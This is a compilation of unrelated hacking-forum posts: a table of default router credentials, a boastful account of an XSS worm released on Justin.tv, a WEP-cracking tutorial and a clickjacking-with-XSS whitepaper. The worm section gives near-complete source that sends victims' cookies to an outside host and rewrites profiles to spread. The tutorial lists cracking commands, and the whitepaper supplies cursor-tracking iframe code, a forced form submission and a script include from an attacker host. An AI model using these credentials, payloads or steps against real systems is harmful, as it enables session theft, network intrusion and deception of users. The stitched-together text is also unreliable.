Default usernames and password



  

Default usernames and passwords for 

                                                                 Routers/Switches/Hubs 


   Type/vendor/notes/etc                     Username Password
  
   3Com                                      admin    synnet
   3Com                                      read     synnet
   3Com                                      write    synnet
   3Com                                      monitor  monitor
   3Com                                      manager  manager
   3Com                                      security security
   3Com_Office_Connect_5x0_ISDN_Routers      n/a      PASSWORD
   3comCellPlex7000                          tech     tech
   3comCoreBuilder7000/6000/3500/2500        debug    synnet
   3comCoreBuilder7000/6000/3500/2500        tech     tech
   3comHiPerARCv4.1.x                        adm      <blank>
   3ComLANplex2500                           debug    synnet
   3ComLANplex2500                           tech     tech
   3comLinkSwitch2000/2700                   tech     tech
   3comSuperStackIISwitch                    2200     debug
   3comSuperStackIISwitch                    2700     tech
   ACC(Ericsson)                             netman   netman
   ADC_Kentrox_Pacesetter_Router             n/a      secret
   All_Zyxel_equipment                       n/a      1234
   AT&T_3B2_firmware                         n/a      mcp
   AXIS200/240[netcam]                       root     pass
   Bay_routers                               Manager  <blank>
   Bay_routers                               User     <blank>
   Bay350T_Switch                            n/a      NetICs
   BaySuperstackII                           security security
   BRASX/I01_(DataCom)                       n/a      letmein
   BreezeCOM_adapters2.x(console_only)       n/a      laflaf
   BreezeCOM_adapters3.x(console_only)       n/a      Master
   BreezeCOM_adapters4.x(console_only)       n/a      Super
   Cayman_DSL                                n/a      <blank>
   Crystalview_outsideview32                 n/a      crystal
   digiCorp_(viper?)                         n/a      BRIDGE
   digiCorp_(viper?)                         n/a      password
   DLink_hub/switches                        D-Link   D-Link
   Flowpoint_DSL_installed_by_Covad          n/a      password
   Flowpoint_DSL2000                         admin    admin
   Jetform_design                            Jetform  n/a
   Lantronics_Terminal_server_port           7000     n/a
   Lantronics_Terminal_server_port           7000     n/a
   Linksys_DSL                               n/a      admin
   Livingston_IRX_router                     !root    <blank>
   Livingston_officerouter                   !root    <blank>
   Livingston_portmaster2/3                  !root    <blank>
   Microplex_print_server                    root     root
   Motorola-Cablerouter                      cablecom router
   Netopia_7100                              <blank>  <blank>
   Netopia_9500                              netopia  netopia
   Orbitor_console                           n/a      password
   Orbitor_console                           n/a      BRIDGE
   Osicom(Datacom)                           sysadm   sysadm
   Shiva                                     root     <blank>
   Shiva                                     Guest    <blank>
   SpeedstreamDSL(Efficient)                 n/a      admin
   UClinux_for_UCsimm                        root     uClinux
   Webramp                                   wradmin  trancell
   Alteon ACEswitch 180e (web)               admin    admin
   Alteon ACEswitch 180e (telnet)            admin    <blank>
   NETPrint (all)                            n/a      sysadm
   Xylan Omniswitch                          admin    switch
   Xylan Omniswitch                          diag     switch
   AcceleratedDSL CPE and DSLAM              sysadm   anicust
   Arrowpoint                                admin    system
   Cabletron (routers & switches)            <blank>  <blank>
  
   Needed
  
   Packeteer
   Cabletron
   SMC
   Accton
  
 


 

XSS worms

XSS worms






XSS worms are pretty neat, interactive worms that propagate by using a client's browser to progressively infect other profiles in some way. I wrote my own worm a while back, and I wanted to talk about how it worked, how it was affective, and what challenges I faced.

The worm I created was in Justin.Tv. The best thing about XSS worms is that they're as unique as the XSS. Tons of different things may occur, and it's up to many different variables that the worm is successful.

The XSS in justin.tv was found by x2Fusion. x2Fusion and I worked on the worm right when we came up with the idea of making one.

The XSS was in the Location field. So, people viewing another user's profile would run whatever we put there, as it was not sanitized. But there was one more challenge: the location was placed in the title sanitized. We had to find a way to not only hide the worm in the title, but we also had to impliment some javascript that automatically changed the title as soon as it loaded.

Once we started on the worm, we made the .js file on an external website, and before script inclusion we put several HTML comment tags to hide it in the title. In the location javascript, we edited the location javascript (local) to dynamically remove the title, keeping it stealthy (as possible) to avoid other issues. The local javascript also made a hidden, blank iFrame that we could reference in the remove javascript.

To start off, the remote javascript would force the iframe to our website and provide, dynamically, the client's cookies and profile location. We would use this to track what profiles were infected by who, and when, and all of the client details at the time.

We would create the payload inside the remote javascript that we can use to inject with the viewing user's profile. The "payload" data is pretty much our local javascript. We also added a ^ (rare location element, if you ask me) character after the user's location, which our local javascript will use to manage the dynamic script.

What we didn't think about, well... we were in a hurry so it's not our fault, ^ would remain on the titles. People would definately notice, but it wasn't patched until about 24 hours after.

We printed a new iFrame (hidden), and used it to read out the details in convinient little sub-frame form elements. We took the elements and processed them, only changing the Location field if it wasn't already infected, and then sending the request (if it wasn't already infected).

This was more complicated as it seemed... we had to fight between IE and Firefox (Safari follows Firefox for the most part) compatibility. After doing that, we realized... if the infected person was... well an actual broadcaster, the default page wasn't what we were looking for. Thus, we needed to dynamically read whether certain elements were given on the page, and also go to the correctly named page.

We had another request upon new infections that saved user details.

Once the request was sent, by then it is assumed the profile was infected and we have it recorded on our side. In-fact, quickly after we released it, I made a quick little PHP script that waited for more accounts to be infected (and their userdetails), and printed out a highlighted table element had it fade out after 5 seconds. After about 1500 profiles, I sat there watching 4 to 10 be infected a second, and it was funny to watch them be infected life.

Actually, check it out:

function URLEncode (clearString)
    {
    var output = '';
    var x = 0;
    clearString = clearString.toString();
    var regex = /(^[a-zA-Z0-9_.]*)/;

    while (x < clearString.length)
        {
        var match = regex.exec(clearString.substr(x));

        if (match != null && match.length > 1 && match[1] != '')
            {
            output += match[1];
            x += match[1].length;
            }

        else
            {
            if (clearString[x] == ' ')
                output += '+';

            else
                {
                var charCode = clearString.charCodeAt(x);
                var hexVal = charCode.toString(16);
                output += '%' + (hexVal.length < 2 ? '0' : '') + hexVal.toUpperCase();
                }
            x++;
            }
        }
    return output;
    }

function save_settings(action, enctype, method, query)
    {
    var xmlHttp;

    try
        {
        xmlHttp = new XMLHttpRequest();
        }
    catch (e)
        {
        try
            {
            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
            }
        catch (e)
            {
            try
                {
                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
                }
            catch (e)
                {
                return false;
                }
            }
        }
    xmlHttp.open(method, action, true);
    xmlHttp.setRequestHeader('Content-Type', enctype);
    xmlHttp.send(query);
    return false;
    }
document.title = document.title.split('^')[0] + " - Justin.tv";
var base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'.split("");
var base64inv = {
};

for (var i = 0; i < base64chars.length; i++)
    {
    base64inv[base64chars[i]] = i;
    }

function b64_d (s)
    {
    s = s.replace(new RegExp('[^' + base64chars.join("") + '=]', 'g'), "");
    var p = (s.charAt(s.length - 1) == '=' ? (s.charAt(s.length - 2) == '=' ? 'AA' : 'A') : "");
    var r = "";
    s = s.substr(0, s.length - p.length) + p;

    for (var c = 0; c < s.length; c += 4)
        {
        var n = (base64inv[s.charAt©] << 18) + (base64inv[s.charAt(c + 1)] << 12) + (base64inv[s.charAt(c + 2)] << 6)
            + base64inv[s.charAt(c + 3)];
        r += String.fromCharCode((n >>> 16) & 255, (n >>> 8) & 255, n & 255);
        }
    return r.substring(0, r.length - p.length);
    }

function b64_e(s)
    {
    var r = "";
    var p = "";
    var c = s.length % 3;

    if (c > 0)
        {
        for (;c < 3; c++)
            {
            p += '=';
            s += "\0";
            }
        }

    for (c = 0; c < s.length; c += 3)
        {
        if (c > 0 && (c / 3 * 4) % 76 == 0)
            {
            r += "\r\n";
            }
        var n = (s.charCodeAt© << 16) + (s.charCodeAt(c + 1) << 8) + s.charCodeAt(c + 2);
        n = [(n >>> 18) & 63, (n >>> 12) & 63, (n >>> 6) & 63, n & 63];
        r += base64chars[n[0]] + base64chars[n[1]] + base64chars[n[2]] + base64chars[n[3]
];
        }
    return r.substring(0, r.length - p.length) + p;
    }
document.getElementById('tframeid').src = "http://thedefaced.org/jtv/jtv_test.php?act=mesh&cookie="
    + b64_e(document.cookie) + "&location=" + b64_e(String(window.location));
document.write("");
payload = b64_d(
    "XjwhLS1BbGwgb3BlbmluZ3MgaW4gYW4gaW50ZXJuYWwgb3IgZXh0ZXJuYWwgZmxvYXRpbmcgcm9
vZiBleGNlcHQgZm9yIGF1dG9tYXRpYyBibGVlZGVyIHZlbnRzICh2YWN1dW0gYnJlYWtlciB2ZW50cyk
g
YW5kIHJpbSBzcGFjZSB2ZW50cyBtdXN0IHByb3ZpZGUgYSBwcm9qZWN0aW9uIGJlbG93IHRoZSBsaXF1
a
WQgc3VyZmFjZSBvciBiZSBlcXVpcHBlZCB3aXRoIGEgY292ZXIsIHNlYWwsIG9yIGxpZCwgd2hpY2ggb
X
VzdCBiZSBpbiBhIGNsb3NlZCAoaS5lLiwgbm8gdmlzaWJsZSBnYXApIHBvc2l0aW9uIGF0IGFsbCB0aW
1
lcyBleGNlcHQgd2hlbiB0aGUgZGV2aWNlIGlzIGluIGFjdHVhbCB1c2UuLS0+IDxpZnJhbWUgaWQ9J3R
m
cmFtZWlkJyB3aWR0aD0wIGhlaWdodD0wIGZyYW1lYm9yZGVyPTA+PC9pZnJhbWU+PHNjcmlwdCBzcmM9
I
mh0dHA6Ly90aGVkZWZhY2VkLm9yZy9qdHYvanR2X3Rlc3QucGhwP2FjdD1qcyIgbGFuZ3VhZ2U9Imphd
m
FzY3JpcHQiPjwvc2NyaXB0PiA8IS0tQWxsIG9wZW5pbmdzIGluIGFuIGludGVybmFsIG9yIGV4dGVybm
F
sIGZsb2F0aW5nIHJvb2YgZXhjZXB0IGZvciBhdXRvbWF0aWMgYmxlZWRlciB2ZW50cyAodmFjdXVtIGJ
y
ZWFrZXIgdmVudHMpIGFuZCByaW0gc3BhY2UgdmVudHMgbXVzdCBwcm92aWRlIGEgcHJvamVjdGlvbiBi
Z
WxvdyB0aGUgbGlxdWlkIHN1cmZhY2Ugb3IgYmUgZXF1aXBwZWQgd2l0aCBhIGNvdmVyLCBzZWFsLCBvc
i
BsaWQsIHdoaWNoIG11c
3QgYmUgaW4gYSBjbG9zZWQgKGkuZS4sIG5vIHZpc2libGUgZ2FwKSBwb3NpdGlvbiBhdCBhbGwgdGltZ
XMgZXhjZXB0IHdoZW4gdGhlIGRldmljZSBpcyBpbiBhY3R1YWwgdXNlLi0tPg==");
document.getElementById('tframeset').onload = function ()
    {
    if (frames['tframeset'].document.getElementById('user_location').value.indexOf(
        'All openings in an internal or external floating roof')
        == -1)
        {
        query = "section=profile&session_user=";
        query += frames['tframeset'].document.getElementById('session_user').value;
        query += "&subsection=profile_info";
        query += "&commit=Save%20Changes";

        if (frames['tframeset'].document.getElementById('user_hide_im_watching').value != 1)
            {
            query += "&user[hide_profile_actions]=0";
            }

        else
            {
            query += "&user[hide_profile_actions]=1";
            };

        if (frames['tframeset'].document.getElementById('user_hide_profile_actions').value != 1)
            {
            query += "&user[hide_profile_actions]=0";
            }

        else
            {
            query += "&user[hide_profile_actions]=1";
            };
        query += "&user[profile_about]="
            + URLEncode(frames['tframeset'].document.getElementById('user_profile_about').value);
        query += "&user[favorite_quotes]="
            + URLEncode(frames['tframeset'].document.getElementById('user_favorite_quotes').value);
        query += "&user[interests]=" + URLEncode(frames['tframeset'].document.getElementById('user_interests').value);
        query += "&user[location]="
            + URLEncode(frames['tframeset'].document.getElementById('user_location').value + payload);
        query += "&user[sex]=" + frames['tframeset'].document.getElementById('user_sex').value;
        query += "&user[name]=" + URLEncode(frames['tframeset'].document.getElementById('user_name').value);
        save_settings('/settings', 'application/x-www-form-urlencoded', 'POST', query);
        }
    document.getElementById('tframeset').onload = function ()
        {
        };

    document.getElementById('tframeset').onreadystatechange = function ()
        {
        };
    };

document.getElementById('tframeset').onreadyst

10 Easy Steps to Crack a Wireless WEP

10 Easy Steps to Crack a Wireless WEP Key 128 bit using Ubuntu 7.10

using Aircrack-ng Tools

This is my First Tutorial

1)sudo airmon-ng start wifi0 (start ur wifi card to monitor mode)

2)sudo wlanconfig ath0 destroy

3)sudo ifconfig ath1 up (makes ur ath1 interface up)

4)sudo iwconfig ath1 mode monitor channel 11 (makes ath1 to set in monitor mode in channel 11)

5)sudo aireplay-ng -1 0 -e linksys -a 00:11:22:33:44:55 -h 00:18:4D:6E:54:79 ath1 ( Sending Authentication Request)

6)sudo aireplay-ng -5 -b 00:11:22:33:44:55 -h 00:18:4D:6E:54:79 ath1 (fragmentation attack)

7)packetforge-ng -0 -a 00:11:22:33:44:55 -h 00:18:4D:6E:54:79 -k 255.255.255.255 -l 255.255.255.255 -y ur xor file.xor -w arp-request (generate an arp packet)

8)sudo airodump-ng -c 11 -bssid 00:11:22:33:44:55 -w capture ath1 (monitors the AP)

9)sudo aireplay-ng -2 -r arp-request ath1 (sending the Arp-request with use interactive frame selection)


10)sudo aircrack-ng -z *.cap (capture*.cap selects all dump files starting with "capture" and ending in "cap") "-z ptw attack

and below is the link for the video

http://in.youtube.com/watch?v=Vvok-PBSpFY



ClickJacking


ClickJacking


-[ INFOS ]-----------------------------------------------------------------------
Title: "The Clickjacking meets XSS: a state of art"

---------------------------------------------------------------------------------


-[ SUMMARY ]---------------------------------------------------------------------
    0x01: Introduction
    0x02: What is the Problem
    0x03: JavaScript always loves us
        \_ 0x03a: Cursor tracking
        \_ 0x03b: Graphic overlaying
    0x04: XSS done!
    0x05: Conclusions
---------------------------------------------------------------------------------



---[ 0x01: Intruduction ]
The clickjacking attacks come from a recent discovery of the two well-known
researchers Jeremiah Grossman (from WhiteHat Security) and Robert "RSnake" Hansen
(from Ha.ckers.org): it's a quite simple but effective attack that has already
been expressed in its potentialities in several articles such as:
http://ha.ckers.org/blog/20081007/clickjacking-details/
http://jeremiahgrossman.blogspot.com/2008/10/clickjacking-web-pages-can-see-and-hear.html

You can take a look to the BlackHat Webcast made by Jeremiah Grossman disclosing
more details on Clickjacking and on HTML and JavaScript designing issues at this
address: http://www.blackhat.com/html/webinars/clickjacking.html

What we'll quickly analyze in this short whitepaper is how to match two different
attacks as XSS and Clickjacking to make their combination even more effective.
-------------------------------------------------------------------------------[/]



---[ 0x02: What is the Problem ]
One of the most common problem during the deploying of client-side attacks (such
as CSRFs), is the spreading of the page with the attacking vectors specifically
built for some purpose.

It's in some way problematic to trick your victim to visit an unknown page where
he should fall to the attack, and it's as much problematic to find the right place
to host that page on the net.

What about injecting your clickjacking vectors in a vulnerable webpage trusted by
the victim himself? This would make the attack less suspicious and probably a way
more easy to accomplish since the user will be completely comforted by the
genuineness of the website he is visiting.
-------------------------------------------------------------------------------[/]



---[ 0x03: JavaScript always loves us ]
Of course we're going to use some JavaScript codes to accomplish our attack
attempts, specifically we're going to try two different methods:
- 0x03a = making a cursor following IFRAME on which the user will be forced to
      click;
- 0x03b = create some specific HTML code to be overlayed on some other inside the
      page.

Have fun :-)
-------------------------------------------------------------------------------[/]



------[ 0x03a: Cursor tracking ]
The first Clickjacking attack we are going to prepare will be named "Cursor
tracking": we'll use JavaScript to make a "moving" trap IFRAME.

Let's start from preparing the code which will deploy the Clickjacking attack:
what we want to do is to get the user clicking on a specific button or link which
will force him to make some action to the website we will load in a crafted
invisible IFRAME.

First let's prepare the IFRAME code in which we'll load the button to be clicked:
   
    <iframe id="victim" src="http://target.com/page.php" scrolling="no"
    style="opacity: 0;position: absolute;left: 10;bottom: 10;"
    width="500px;"></iframe>

In this simple IFRAME declaration we just have to be sure to turn off the
"scrolling" function and to set the "opacity" property to 0 in order to make the
page invisible to the victim.  The position of the page inside the IFRAME depends
on where the user should click, you would probably want to fix it using:

    margin-top: X;
    margin-left: X;

Using negative values you'll get the page more and more centered into the IFRAME.

The next step is to prepare a JavaScript function that will make the IFRAME follow
the users cursor on the webpage we'll inject the code into, and we can achieve
this using the Event Handlers as following.

    function getPosition(e) {
        e = e || window.event;
        var cursor = {x:0, y:0};
            if (e.pageX || e.pageY) {
            cursor.x = e.pageX;
            cursor.y = e.pageY;
        } else {
            var de = document.documentElement;
            var b = document.body;
            cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) - /
            (de.clientLeft || 0);
            cursor.y = e.clientY + (de.scrollTop || b.scrollTop) -      /
            (de.clientTop || 0);
        }
       
        return cursor;
    }

This function retrieve the X and Y coordinates of the user's cursor in the webpage
everytime it gets called.

    function clickjacking(e) {
        var loadFrame = document.getElementById("victim");
        var curPos = getPosition(e);
        loadFrame.setAttribute('style','opacity:0;position:absolute;top:'/
        + (curPos.y - 80) + ';left:' + (curPos.x - 15) + ';');
    }

Again, this one loads the IFRAME, calls the previous "getPosition" function and
changes the style attributes of the loaded IFRAME with the new coordinates
retrieved from the cursor tracking function.

    window.captureEvents(Event.MOUSEMOVE);
    window.onmousemove=clickjacking;

This will call the MOUSEMOVE Event handler and make the "clickjacking" function be
called at each user's cursor movement inside the webpage.  As we are now the
JavaScript codes we created make the IFRAME follows the victim's cursor inside a
webpage and force him to click on a specific button contained in that IFRAME at
each click he apparently make on a safe and genuine page.

Now let's make our JavaScript print out the IFRAME inside the HTML code with
document.write:

document.write("<iframe id=\"victim\" src=\"http://target.com/page.php\"
scrolling=\"no\" style=\"opacity: 0;position: absolute;left: 10;bottom: 10;\"
width=\"500px;\"></iframe>");

In this way the IFRAME code will be printed inside the vulnerable web page we're
going to disfrut as soon as our XSS attack vector is included.

Our JavaScript code will finally look as following:

<!-- clickjacking.js -->
function getPosition(e) {
    e = e || window.event;
    var cursor = {x:0, y:0};

    if (e.pageX || e.pageY) {
        cursor.x = e.pageX;
        cursor.y = e.pageY;
    } else {
        var de = document.documentElement;
        var b = document.body;
        cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) -  /
        (de.clientLeft || 0);
        cursor.y = e.clientY + (de.scrollTop || b.scrollTop) -    /
        (de.clientTop || 0);
    }
   
    return cursor;
}

function clickjacking(e) {
    var loadFrame = document.getElementById("victim");
    var curPos = getPosition(e);
    loadFrame.setAttribute('style','opacity:0;position:absolute;top:' +  /
    (curPos.y - 80) + ';left:' + (curPos.x - 15) + ';');
}

window.captureEvents(Event.MOUSEMOVE);
window.onmousemove=clickjacking;

document.write("<iframe id=\"victim\" src=\"http://target.com/page.php\"  /
scrolling=\"no\" style=\"opacity: 0;position: absolute;left: 10;bottom: 10;\"  /
width=\"500px;\"></iframe>");
<!-- EOF -->
-------------------------------------------------------------------------------[/]



------[ 0x03b: Graphic overlaying ]
Another way is to create some HTML code to be injected in the webpage which
graphic components will be overlayed by new fake ones that will invite the user to
click.

For example let's assume that our victim is visiting a website in which there is a
code that permits him to remove his buddies:

    <form method="POST" name="friends" action="remove.php">
        <div>George Lucas</div>
        <input type="hidden" name="friendid" value="123456" />
        <input type="submit" value="Remove from friends" />
    </form>

We want to force the user to remove "George Lucas" from his friends without his
acknowledgement, we can eventually craft some JavaScript code as following:

<!-- clickjacking.js -->
function bonus() {
    document.friends.submit();
}
document.write("<div style=\"position:absolute;top:Ypx;left:Xpx;\"><input  /
type=button value=\"Your friend sent you a gift, get it!\" onClick=\"javascript:bonus()\" /
/></div>");
<!-- EOF -->

This will create a button to be overlayed at X and Y coordinates, exactly
overlaying the "Remove from friends" button making it invisible to the user.  When
clicking our button he will instead submit the FORM which will remove the poor
"George Lucas" from his buddy list.

This is just an example of how can be used the overlaying technique, another one
could be to replace the original login form with a new one specifically crafted
and positioned inside the page with the TOP and LEFT style attributes.
-------------------------------------------------------------------------------[/]



---[ 0x04: XSS done! ]
Assuming that a common webpage our victim is used to visit (like a ebanking page
or a blog or whatever) is vulnerable to Cross Site Scripting (a way better if
Permanent), we can inject our JavaScript code previously forged in order to deploy
our XSS-Clickjacking attack in which the victim will almost certainly fall into.

<script src=http://evilhost.com/clickjacking.js></script>

This is the XSS vector we should use to make our JavaScript code to be executed on
the victim's browser: the injecting can be done, as we've already seen
(http://www.playhack.net/papers/18), through a URL's GET parameter or a user form
input not sanitized.

Obviously a Non-Permanent XSS vulnerability would require some previous spreading,
in order to get the victim noticed of the crafted malicious link on which he
should get.
-------------------------------------------------------------------------------[/]



---[ 0x05: Conclusions ]
The clickjacking is a very cute attacking technique that gets even better when
matched with a Permanent or Non-Permanent Cross Site Scripting vulnerability.

The funny and interesting thing of this attack is that leaves a lot of space to
the attacker creativity and inventiveness, letting him express the best idea of
the sublime art of tricking web users.

There are tons of possibilities and i invite you to mail me whenever you create a
new and smart one you'd like to share ;-)
-------------------------------------------------------------------------------[/]